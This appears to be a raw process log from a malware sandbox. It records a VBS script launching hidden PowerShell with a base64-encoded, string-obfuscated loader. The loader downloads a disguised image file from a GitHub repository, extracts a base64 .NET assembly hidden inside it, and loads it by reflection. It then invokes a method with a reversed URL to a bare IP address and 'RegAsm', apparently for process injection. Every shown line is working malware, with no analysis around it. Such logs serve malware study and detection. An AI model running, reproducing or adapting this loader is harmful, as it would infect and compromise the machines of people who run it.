wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\333343MPDW-constraints.vbs
1932powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezB9JysnaW1hZ2VVcmwgPSB7MX1odHRwczovL3Jhdy5naXRodWJ1c2VyY29udGVudC5jb20vQ3J5cHRlcnNBbmRUb29sc09maWNpYWwvWklQL3JlZnMvaGVhZHMvJysnbWFpbi9EZXRhaE5vdGVfVi5qcGcgezF9O3swfXdlYkNsaWVudCA9IE5ldy1PJysnYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7ezB9aW1hZ2VCeXRlcyA9IHswfXdlYkNsaWVudC5Eb3dubG9hZERhdGEoezB9aW1hZ2VVcmwpO3swfWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKHswfWltYWdlQnl0ZXMpO3swfXN0YXJ0RmxhZyA9IHsnKycxfTw8QkFTRTY0X1NUJysnQVJUPj57MX07ezB9ZW5kRmxhZyA9IHsxfTw8QkFTRTY0X0VORD4+ezF9O3swfXN0YXJ0SW4nKydkZXggPSB7MH1pbWFnZVRleHQuSW5kZXgnKydPZih7MH1zdGFydEZsYWcpO3swfWVuZEluZGV4ID0gezB9aW1hZ2VUZXgnKyd0LkluZGV4T2YoezB9ZW5kRmxhZyk7ezB9c3RhcnRJbmRleCAtZ2UgMCAtYW5kIHswfWVuZEluZGV4IC1ndCB7MH1zdGFydCcrJ0luZCcrJ2V4O3swfXN0YXJ0SW5kZXggKz0gezB9c3RhcnRGbGFnLkxlbmd0aDt7MH1iYXNlNjRMZW5ndGggPSB7MH1lbmRJbmRleCAtJysnIHswfXN0YXJ0SW5kZXg7ezB9YmFzZTY0Q29tbWFuZCA9IHswfWltYWdlVGV4dC5TdWJzdHJpbmcnKycoezB9c3RhcnRJbmRleCwgezB9YmFzZTY0TGVuZ3RoKTt7MH1jb21tYW5kQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3QnKydyaW5nJysnKHswfWJhc2U2NENvbW1hbmQpO3swfWxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCh7MH1jbycrJ20nKydtYW5kQnl0ZXMpO3swfXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoezF9VicrJ0FJezF9KTt7MH12YWlNZXRob2QuSW52b2tlKHswfScrJ251bGwsIEAoezF9dHh0LjQ0NDQ2ZXNhYmJiYmJiZXdtYWRhbS80MzEuODcxLjY0Ljg5MS8vOnB0dGh7JysnMX0sIHsxfWRlc2F0aXZhZG97MX0sIHsxfWRlc2F0aXZhZG97MX0sIHsxfWRlc2F0aXZhZG97MX0sIHsxfVJlZ0FzbXsxfSwnKycgezF9ZGVzYXRpdmFkb3sxfSwgezF9ZGVzYXRpdmFkb3sxfSkpOycpIC1mIFtjSEFyXTM2LFtjSEFyXTM5KSB8IC4oICRzSGVMbElkWzFdKyRzaEVsbGlkWzEzXSsneCcp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
2148powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{0}'+'imageUrl = {1}https://raw.githubusercontent.com/CryptersAndToolsOficial/ZIP/refs/heads/'+'main/DetahNote_V.jpg {1};{0}webClient = New-O'+'bject System.Net.WebClient;{0}imageBytes = {0}webClient.DownloadData({0}imageUrl);{0}imageText = [System.Text.Encoding]::UTF8.GetString({0}imageBytes);{0}startFlag = {'+'1}<<BASE64_ST'+'ART>>{1};{0}endFlag = {1}<<BASE64_END>>{1};{0}startIn'+'dex = {0}imageText.Index'+'Of({0}startFlag);{0}endIndex = {0}imageTex'+'t.IndexOf({0}endFlag);{0}startIndex -ge 0 -and {0}endIndex -gt {0}start'+'Ind'+'ex;{0}startIndex += {0}startFlag.Length;{0}base64Length = {0}endIndex -'+' {0}startIndex;{0}base64Command = {0}imageText.Substring'+'({0}startIndex, {0}base64Length);{0}commandBytes = [System.Convert]::FromBase64St'+'ring'+'({0}base64Command);{0}loadedAssembly = [System.Reflection.Assembly]::Load({0}co'+'m'+'mandBytes);{0}vaiMethod = [dnlib.IO.Home].GetMethod({1}V'+'AI{1});{0}vaiMethod.Invoke({0}'+'null, @({1}txt.44446esabbbbbbewmadam/431.871.64.891//:ptth{'+'1}, {1}desativado{1}, {1}desativado{1}, {1}desativado{1}, {1}RegAsm{1},'+' {1}desativado{1}, {1}desativado{1}));') -f [cHAr]36,[cHAr]39) | .( $sHeLlId[1]+$shEllid[13]+'x')"
2260